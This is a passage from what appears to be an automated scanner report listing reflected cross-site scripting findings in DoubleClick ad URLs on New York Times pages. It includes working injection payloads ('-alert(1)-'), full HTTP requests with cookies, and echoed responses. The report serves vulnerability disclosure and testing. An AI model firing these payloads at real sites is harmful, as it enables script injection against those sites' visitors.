The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3f05'-alert(1)-'f00d86fef5b was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.64. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c19"-alert(1)-"574e3fb75c9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.65. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ae75'-alert(1)-'db690faebc3 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.66. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd16'-alert(1)-'78a5aad6cc9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.67. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d645f"-alert(1)-"28e168298f6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.68. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cb77"-alert(1)-"c68a3f4ad51 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.69. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb377'-alert(1)-'9e6b8a939e3 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.70. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3349f'-alert(1)-'d13d8baec0a was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.71. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51f8e"-alert(1)-"e3926989a12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl
...[SNIP]...

4.72. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26706'-alert(1)-'78f402d040 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.73. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

